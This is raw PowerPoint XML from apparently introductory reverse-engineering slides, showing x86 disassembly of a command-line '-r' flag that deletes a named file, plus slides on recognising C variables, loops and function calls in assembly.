              <a:t>004113CE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> 	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>], 3 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004113D2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>jz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>loc_4113D8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004113D4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004113D6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>loc_411414</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004113D8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004113DA push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MaxCount</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004113DC push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Str2 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004113E1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004113E4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [eax+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004113E7 push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Str1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004113E8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>call	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>return to EAX</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004113F8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>test	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004113FA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>jnz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>loc_411412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004113FC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004113FE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00411401 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [eax+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00411404 push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lpFileName</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00411405 call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>DeleteFileA</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="848791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Recognizing C/C++ structure</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Local &amp; global variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Operation +, -, ++, --, %</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>ondition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Loop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>while</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Function calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Other: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>switch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>structs</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33374225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Recognizing C/C++ structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Global &amp; Local variable</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1844824"/>
            <a:ext cx="3125225" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> x = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> y = 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>void main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>x = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>x+y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>("Total = %d\n", x);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="4151366"/>
            <a:ext cx="3125225" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>void main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> x = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>y = 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>x = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>x+y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>("Total = %d\n", x);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3923928" y="1844823"/>
            <a:ext cx="4835363" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401003 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>dword_40CF60;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401008 add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>dword_40C000; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040100E </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>dword_40CF60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401013 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>dword_40CF60</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401019 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>push	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040101A push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>aTotalD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"total = %d\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040101F call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
